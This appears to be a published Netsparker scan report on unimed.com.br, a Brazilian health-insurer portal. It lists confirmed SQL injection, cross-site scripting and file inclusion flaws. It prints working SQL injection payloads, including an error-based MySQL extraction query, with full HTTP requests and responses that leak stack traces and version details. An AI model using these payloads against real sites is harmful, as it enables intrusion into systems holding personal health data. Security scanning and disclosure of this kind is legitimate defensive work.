Phishing, Insecure Configuration, XSS, Cross Site Scripting in unimed.com.br, CWE-79, CAPEC-86, DORK, GHDB Report

Loading



Netsparker - Scan Report Summary
TARGET URL
http://www.unimed.com.br/pct/index.jsp?cd_can...
DORK DATE
11/15/2011 11:03:03 AM
REPORT DATE
11/15/2011 12:04:36 PM
DORK DURATION
00:21:28

Total Requests

Average Speed

req/sec.
35
identified
21
confirmed
3
critical
9
informational

DORK SETTINGS

Scan Settings
PROFILE
Previous Settings
DORK TESTS
Crowdsource
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
9 %
IMPORTANT
29 %
MEDIUM
11 %
LOW
26 %
INFORMATION
26 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/Comunicacao/busca.do [Possible] Internal Path Leakage (Windows) No
/Comunicacao/detalhe.do cdComunicacao GET Boolean Based SQL Injection Yes
cdComunicacao GET SQL Injection Yes
cdComunicacao GET [Probable] SQL Injection No
Tomcat Version Disclosure No
cdComunicacao GET Database Error Message No
cdComunicacao GET Tomcat Exception Report Disclosure No
MySQL Database Identified Yes
Tomcat Version Is Out Of Date No
MySQL Version Is Out Of Date No
/Comunicacao/img.do cdComunicacao GET Local File Inclusion Yes
[Possible] Internal Path Leakage (*nix) No
/Comunicacao/novo.do File Upload Functionality Identified Yes
/crossdomain.xml Open Policy Crossdomain.xml Identified Yes
/pct/ Forbidden Resource Yes
/pct/comum/js/myJsEvents.js E-mail Address Disclosure No
/pct/comum/redireciona.jsp cd_materia GET HTTP Header Injection No
/pct/corpo/2009-materia-plus/dialog/redes-sociais/mais_redes.jsp Internal Server Error Yes
/pct/index.jsp codigoUnimed GET Cross-site Scripting Yes
aprovadas GET Cross-site Scripting Yes
TRACE / TRACK Identified Yes
/pctr/comum/redireciona.jsp cd_materia GET HTTP Header Injection No
/pctr/layout/layout_2005/form_login.jsp cd_canal GET Cross-site Scripting Yes
cd_secao GET Cross-site Scripting Yes
cd_canal GET Cross-site Scripting Yes
Critical Form Served Over HTTP Yes
Auto Complete Enabled Yes
/pctr/servlet/NovoLoginUsuario cd_canal POST Cross-site Scripting Yes
secao_ativa POST Cross-site Scripting Yes
kitsite POST Cross-site Scripting Yes
Cookie Not Marked As Secure Yes
/portal/ Cookie Not Marked As HttpOnly Yes
Apache Version Disclosure No
Java Servlet Version Disclosure No
Apache Version Is Out Of Date No
Boolean Based SQL Injection

Boolean Based SQL Injection

1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Crawler confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed Netsparker to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

The best way to protect your code against SQL Injections is using parameterised queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- /Comunicacao/detalhe.do

/Comunicacao/detalhe.do CONFIRMED

http://www.unimed.com.br/Comunicacao/detalhe.do?acao=inicial&cdComunicacao=-1+OR+17-7%3d10

Parameters

Parameter Type Value
acao GET inicial
cdComunicacao GET -1 OR 17-7=10

Request

GET /Comunicacao/detalhe.do?acao=inicial&cdComunicacao=-1+OR+17-7%3d10 HTTP/1.1
Referer: http://www.unimed.com.br/Comunicacao/busca.do
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=A34319D85478196EC8CE01EAB94ED696.dcpr5033; JSESSIONID=19B6C6E1082BF10468FAF02C8120DAEF.dcpr5033; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:14:34 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><meta http-equiv="Content-Language" content="pt-BR"><title>Portal Nacional de Saúde :: Unimed do Brasil</title><style type="text/css"><!--.style2 { font-family: Arial, Helvetica, sans-serif; color: #FF0000;}--></style><meta name="description" content="Modelo de site externo com barra de menu."><meta name="keywords" content="Unimed, portal, saude, Brasil"><meta name="author" content="Dynamix Software Ltda (www.dynamix.com.br)."><meta name="copyright" content="Copyright (c) 2004 Dynamix Software Ltda."><!-- barra de navegacao --><link rel="stylesheet" type="text/css" href="./colaborador.css"><link rel="stylesheet" type="text/css" href="./estilos.css"><!-- folhas de estilo --></head><body><!-- INI TOPO --><div id="topo"><!-- ini logo unimed --><h1><img src="./imagens/logo_unimed.gif" alt="Unimed." title="Unimed."></h1><!-- fim logo unimed --><!-- ini fechar --><div><a href="javascript:window.close()" title="Fechar este site externo.">Fechar</a></div><!-- fim fechar --></div><!-- FIM TOPO --><!-- INI CONTEUDO --><div id="conteudo"><table class="estrutura" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td valign="top"><!-- ini barra de menu --><div class="menu"><!-- ini nome da unimed --><div class="nomeUnimed"><!-- Joaçaba --></div><!-- fim nome da unimed --><!-- ini menu --><ul><li class="titulo"><a href="#" class="titulo"><img class="seta" src="./imagens/seta_branca_abaixo.gif" alt="Voltar" border="0"><span></span></a>Veículos de Comunicação</li><li class="item"><a href="/Comunicacao/busca.do?acaoLink=pesquisaDetalhe">Consultar Ve&iacute;culos de Comunica&ccedil;&atilde;o</a> </a></li></ul><!-- fim menu --><br><br><br><br><br><br><br></div><!-- fim barra de menu --></td><td><!-- ini cabecalho --><div class="cabecalho"><h2>Ve&iacute;culos de Comunica&ccedil;&atilde;o do Sistema Unimed </h2></div><!-- fim cabecalho --><!-- ini corpo --><div class="corpo"><!-- ini navegacao persistente -->Ve&iacute;culos de Comunica&ccedil;&atilde;o<!-- fim navegacao persistente --><!-- ini nome secao --><h5>Detalhe de Veículos </h5><!-- fim nome secao --><!-- ini conteudo da pagina --><div><form name="buscaForm" method="post" action="/Comunicacao/busca.do"><input type="hidden" name="acao" value="3"> <table width="100%" border="0" > <tr> <td width="48%"> <div align="center"> <img src="/Comunicacao/img.do?cdComunicacao=" height="240" width="220" id="teste"> </div> </td> <td width="52%"><table width="100%" border="0" cellpadding=5"> <tr> <td>Unimed: <b></b></td> </tr> <tr> <td>Formato: <b></b></td> </tr> <tr> <td>Público Alvo: <b> Médico Cooperado; Secretária do Médico; Funcionários; Dirigentes; Comunidade; Prestadores Serviços; Clientes; Dirigentes e colaboradores das coopetiva; Dirigentes e colaboradores das coopetiva; Cooperados, usuários do site clientes e; Clientes; Secretárias de Médicos Cooperados; Clientes; Secretárias de Médicos Cooperados; Secretárias; Dirigentes das 21 Unimeds do estado e da; Unimeds associadas; Unimeds associadas; Unimeds associadas; Médico Cooperado, Clientes e Singulares; Empresas clientes; Assessores do Sistema; Profissionais do Grupo de Desenvolviment; Grupo Desenv. Humano, Dirigentes e técn; Dirigentes, técnicos, entre outros; Mantenedores da Fundação Unimed; Alunos, Professores, Consultores e Coope; Alunos, Professores, Consultores, etc; Acionistas; Conselho Fiscal e Administrativo; beneficiários do Programa de RS; líderes cooperativistas e médicas; Secretárias e auxiliares de escritório; Unimed sócias da CNU; Unimeds associadas; Unimeds associadas; Unimeds associadas; Clientes Empresariais; Secretárias dos Cooperados; Profissional de Comunicação; Unimeds; Médicos cooperados e empresas selecionad; Dirigentes e Unimeds ; Dirigentes do Sistema Unimed em Goiás e ; Todos os públicos; Sistema Unimed; Dirigentes, Sistema Unimed, gerentes e p; Todo o Sistema Unimed Santa Catarina; Cooperados, Unimeds, Contratantes e Bene; Cooperados, Funcionários, Singulares, em; Médicos Cooperados e Sistema Unimed; Externo; Médicos cooperados, colaboradores, clien; Médicos Cooperados, Clientes PJ, Bancos ; Interno e Externo ; Dirigentes do Sistema Unimed, entidades ; Credenciados; Secretárias dos médicos cooperados; Piracicaba e regiçao; Piracicaba e regiçao; Piracicaba e regiçao; Piracicaba e região; Credenciados; Secretárias dos médicos cooperados; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Vendedores do Plano de Saúde Unimed; Vendedores do Plano de Saúde Unimed; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Dirigentes, superintendentes e gestores ; Médicos Cooperados, Funcionários, Fornec; Médicos Cooperados, Funcionários, Fornec; Unimeds; Unimeds; Unimeds; Médicos cooperados, profissionais de ate; Cooperados, colaboradores, clientes e pa; Cooperados e Unimeds; Cooperados e Unimeds; Sistema Unimed e Cooperados; Cooperados, singulares do Estado do RJ e; Clientes, cooperados, colaboradores; Médicos Cooperados, funcionários, clínic; Clientes, médicos cooperados, prestadore; Médicos Cooperados, Clientes PJ, Bancos ; Médicos Cooperados, Clientes PJ, Bancos ; Médicos Cooperados, Clientes PJ, Bancos ; Unimeds associadas; Médico Cooperado; Secretária do Médico; Funcionários; Dirigentes; Comunidade; Prestadores Serviços; Clientes; Dirigentes e colaboradores das coopetiva; Dirigentes e colaboradores das coopetiva; Cooperados, usuários do site clientes e; Clientes; Secretárias de Médicos Cooperados; Clientes; Secretárias de Médicos Cooperados; Secretárias; Dirigentes das 21 Unimeds do estado e da; Unimeds associadas; Unimeds associadas; Unimeds associadas; Médico Cooperado, Clientes e Singulares; Empresas clientes; Assessores do Sistema; Profissionais do Grupo de Desenvolviment; Grupo Desenv. Humano, Dirigentes e técn; Dirigentes, técnicos, entre outros; Mantenedores da Fundação Unimed; Alunos, Professores, Consultores e Coope; Alunos, Professores, Consultores, etc; Acionistas; Conselho Fiscal e Administrativo; beneficiários do Programa de RS; líderes cooperativistas e médicas; Secretárias e auxiliares de escritório; Unimed sócias da CNU; Unimeds associadas; Unimeds associadas; Unimeds associadas; Clientes Empresariais; Secretárias dos Cooperados; Profissional de Comunicação; Unimeds; Médicos cooperados e empresas selecionad; Dirigentes e Unimeds ; Dirigentes do Sistema Unimed em Goiás e ; Todos os públicos; Sistema Unimed; Dirigentes, Sistema Unimed, gerentes e p; Todo o Sistema Unimed Santa Catarina; Cooperados, Unimeds, Contratantes e Bene; Cooperados, Funcionários, Singulares, em; Médicos Cooperados e Sistema Unimed; Externo; Médicos cooperados, colaboradores, clien; Médicos Cooperados, Clientes PJ, Bancos ; Interno e Externo ; Dirigentes do Sistema Unimed, entidades ; Credenciados; Secretárias dos médicos cooperados; Piracicaba e regiçao; Piracicaba e regiçao; Piracicaba e regiçao; Piracicaba e região; Credenciados; Secretárias dos médicos cooperados; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Vendedores do Plano de Saúde Unimed; Vendedores do Plano de Saúde Unimed; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Dirigentes, superintendentes e gestores ; Médicos Cooperados, Funcionários, Fornec; Médicos Cooperados, Funcionários, Fornec; Unimeds; Unimeds; Unimeds; Médicos cooperados, profissionais de ate; Cooperados, colaboradores, clientes e pa; Cooperados e Unimeds; Cooperados e Unimeds; Sistema Unimed e Cooperados; Cooperados, singulares do Estado do RJ e; Clientes, cooperados, colaboradores; Médicos Cooperados, funcionários, clínic; Clientes, médicos cooperados, prestadore; Médicos Cooperados, Clientes PJ, Bancos ; Médicos Cooperados, Clientes PJ, Bancos ; Médicos Cooperados, Clientes PJ, Bancos ; Unimeds associadas; Médico Cooperado; Secretária do Médico; Funcionários; Dirigentes; Comunidade; Prestadores Serviços; Clientes; Dirigentes e colaboradores das coopetiva; Dirigentes e colaboradores das coopetiva; Cooperados, usuários do site clientes e; Clientes; Secretárias de Médicos Cooperados; Clientes; Secretárias de Médicos Cooperados; Secretárias; Dirigentes das 21 Unimeds do estado e da; Unimeds associadas; Unimeds associadas; Unimeds associadas; Médico Cooperado, Clientes e Singulares; Empresas clientes; Assessores do Sistema; Profissionais do Grupo de Desenvolviment; Grupo Desenv. Humano, Dirigentes e técn; Dirigentes, técnicos, entre outros; Mantenedores da Fundação Unimed; Alunos, Professores, Consultores e Coope; Alunos, Professores, Consultores, etc; Acionistas; Conselho Fiscal e Administrativo; beneficiários do Programa de RS; líderes cooperativistas e médicas; Secretárias e auxiliares de escritório; Unimed sócias da CNU; Unimeds associadas; Unimeds associadas; Unimeds associadas; Clientes Empresariais; Secretárias dos Cooperados; Profissional de Comunicação; Unimeds; Médicos cooperados e empresas selecionad; Dirigentes e Unimeds ; Dirigentes do Sistema Unimed em Goiás e ; Todos os públicos; Sistema Unimed; Dirigentes, Sistema Unimed, gerentes e p; Todo o Sistema Unimed Santa Catarina; Cooperados, Unimeds, Contratantes e Bene; Cooperados, Funcionários, Singulares, em; Médicos Cooperados e Sistema Unimed; Externo; Médicos cooperados, colaboradores, clien; Médicos Cooperados, Clientes PJ, Bancos ; Interno e Externo ; Dirigentes do Sistema Unimed, entidades ; Credenciados; Secretárias dos médicos cooperados; Piracicaba e regiçao; Piracicaba e regiçao; Piracicaba e regiçao; Piracicaba e região; Credenciados; Secretárias dos médicos cooperados; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Vendedores do Plano de Saúde Unimed; Vendedores do Plano de Saúde Unimed; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Dirigentes, superintendentes e gestores ; Médicos Cooperados, Funcionários, Fornec; Médicos Cooperados, Funcionários, Fornec; Unimeds; Unimeds; Unimeds; Médicos cooperados, profissionais de ate; Cooperados, colaboradores, clientes e pa; Cooperados e Unimeds; Cooperados e Unimeds; Sistema Unimed e Cooperados; Cooperados, singulares do Estado do RJ e; Clientes, cooperados, colaboradores; Médicos Cooperados, funcionários, clínic; Clientes, médicos cooperados, prestadore; Médicos Cooperados, Clientes PJ, Bancos ; Médicos Cooperados, Clientes PJ, Bancos ; Médicos Cooperados, Clientes PJ, Bancos ; Unimeds associadas; Médico Cooperado; Secretária do Médico; Funcionários; Dirigentes; Comunidade; Prestadores Serviços; Clientes; Dirigentes e colaboradores das coopetiva; Dirigentes e colaboradores das coopetiva; Cooperados, usuários do site clientes e; Clientes; Secretárias de Médicos Cooperados; Clientes; Secretárias de Médicos Cooperados; Secretárias; Dirigentes das 21 Unimeds do estado e da; Unimeds associadas; Unimeds associadas; Unimeds associadas; Médico Cooperado, Clientes e Singulares; Empresas clientes; Assessores do Sistema; Profissionais do Grupo de Desenvolviment; Grupo Desenv. Humano, Dirigentes e técn; Dirigentes, técnicos, entre outros; Mantenedores da Fundação Unimed; Alunos, Professores, Consultores e Coope; Alunos, Professores, Consultores, etc; Acionistas; Conselho Fiscal e Administrativo; beneficiários do Programa de RS; líderes cooperativistas e médicas; Secretárias e auxiliares de escritório; Unimed sócias da CNU; Unimeds associadas; Unimeds associadas; Unimeds associadas; Clientes Empresariais; Secretárias dos Cooperados; Profissional de Comunicação; Unimeds; Médicos cooperados e empresas selecionad; Dirigentes e Unimeds ; Dirigentes do Sistema Unimed em Goiás e ; Todos os públicos; Sistema Unimed; Dirigentes, Sistema Unimed, gerentes e p; Todo o Sistema Unimed Santa Catarina; Cooperados, Unimeds, Contratantes e Bene; Cooperados, Funcionários, Singulares, em; Médicos Cooperados e Sistema Unimed; Externo; Médicos cooperados, colaboradores, clien; Médicos Cooperados, Clientes PJ, Bancos ; Interno e Externo ; Dirigentes do Sistema Unimed, entidades ; Credenciados; Secretárias dos médicos cooperados; Piracicaba e regiçao; Piracicaba e regiçao; Piracicaba e regiçao; Piracicaba e região; Credenciados; Secretárias dos médicos cooperados; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Vendedores do Plano de Saúde Unimed; Vendedores do Plano de Saúde Unimed; Profissionais de Comunicação e Marketing; Profissionais de Comunicação e Marketing; Dirigentes, superintendentes e gestores ; Médicos Cooperados, Funcionários, Fornec; Médicos Cooperados, Funcionários, Fornec; Unimeds; Unimeds; Unimeds; Médicos cooperados, profissionais de ate; Cooperados, colaboradores, clientes e pa; Cooperados e Unimeds; Cooperados e Unimeds; Sistema Unimed e Cooperados; Cooperados, singulares do Estado do RJ e; Clientes, cooperados, colaboradores; Médicos Cooperados, funcionários, clínic; Clientes, médicos cooperados, prestadore; Médicos Cooperados, Clientes PJ, Bancos ; Médicos Cooperados, Clientes PJ, Bancos ; Médicos Cooperados, Clientes PJ, Bancos ; Unimeds associadas; Médico Cooperado; Secretária do Médico; Funcionários; Dirigentes; Comunidade; Prestadores Serviços; Clientes; Dirigentes e colaboradores das coopetiva; Dirigentes e colaboradores das coopetiva; Cooperados, usuários do site clientes e; Clientes; Secretárias de Médicos Cooperados; Clientes; Secretárias de Médicos Cooperados; Secretárias; Dirigentes das 21 Unimeds do estado e da; Unimeds associadas; Unimeds associadas; Unimeds associadas; Médico Cooperado, Clientes e Singulares; Empresas clientes; Assessores do Sistema; Profissionais do Grupo de Desenvolviment; Grupo Desenv. Humano, Dirigentes e técn; Dirigentes, técnicos, entre outros; Mantenedores da Fundação Unimed; Alunos, Professores,..
SQL Injection

SQL Injection

1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Crawler confirmed the vulnerability by executing a test SQL Query on the back-end database.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- /Comunicacao/detalhe.do

/Comunicacao/detalhe.do CONFIRMED

http://www.unimed.com.br/Comunicacao/detalhe.do?acao=inicial&cdComunicacao=(select+1+and+row(1%2c1)%..

Parameters

Parameter Type Value
acao GET inicial
cdComunicacao GET (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

Extracted Data

5.0.77-log

Request

GET /Comunicacao/detalhe.do?acao=inicial&cdComunicacao=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: http://www.unimed.com.br/Comunicacao/busca.do
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=5DD9C8CFD3D902CD91DF57B601077A4E.dcpr5033; JSESSIONID=19B6C6E1082BF10468FAF02C8120DAEF.dcpr5033; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 15 Nov 2011 17:14:15 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Length: 3405
Connection: close
Content-Type: text/html;charset=utf-8


<html><head><title>Apache Tomcat/5.5.9 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>javax.servlet.ServletException: Duplicate key or integrity constraint violation message from server: &quot;Duplicate entry '_!@4dilemma:0' for key 1&quot; org.apache.struts.action.RequestProcessor.processException(RequestProcessor.java:516) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:423) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>root cause</b> <pre>java.sql.SQLException: Duplicate key or integrity constraint violation message from server: &quot;Duplicate entry '_!@4dilemma:0' for key 1&quot; com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:1997) com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:1906) com.mysql.jdbc.MysqlIO.nextRow(MysqlIO.java:997) com.mysql.jdbc.MysqlIO.getResultSet(MysqlIO.java:296) com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:1325) com.mysql.jdbc.MysqlIO.sqlQuery(MysqlIO.java:1224) com.mysql.jdbc.Connection.execSQL(Connection.java:2244) com.mysql.jdbc.Connection.execSQL(Connection.java:2192) com.mysql.jdbc.Statement.executeQuery(Statement.java:1163) org.jboss.resource.adapter.jdbc.WrappedStatement.executeQuery(WrappedStatement.java:208) br.com.unimed.portal.veiculocomunicacao.dao.ComunicacaoDAO.populaComunicacao(ComunicacaoDAO.java:459) br.com.unimed.portal.veiculocomunicacao.action.DetalheAction.execute(DetalheAction.java:28) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:421) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.9 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.9</h3></body></html>
[Probable] SQL Injection

[Probable] SQL Injection

1 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- /Comunicacao/detalhe.do

/Comunicacao/detalhe.do

http://www.unimed.com.br/Comunicacao/detalhe.do?acao=inicial&cdComunicacao=%2527

Parameters

Parameter Type Value
acao GET inicial
cdComunicacao GET %27

Request

GET /Comunicacao/detalhe.do?acao=inicial&cdComunicacao=%2527 HTTP/1.1
Referer: http://www.unimed.com.br/Comunicacao/busca.do
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=5DD9C8CFD3D902CD91DF57B601077A4E.dcpr5033; JSESSIONID=19B6C6E1082BF10468FAF02C8120DAEF.dcpr5033; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 15 Nov 2011 17:14:10 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Length: 3481
Connection: close
Content-Type: text/html;charset=utf-8


<html><head><title>Apache Tomcat/5.5.9 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>javax.servlet.ServletException: Syntax error or access violation message from server: &quot;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27' at line 1&quot; org.apache.struts.action.RequestProcessor.processException(RequestProcessor.java:516) 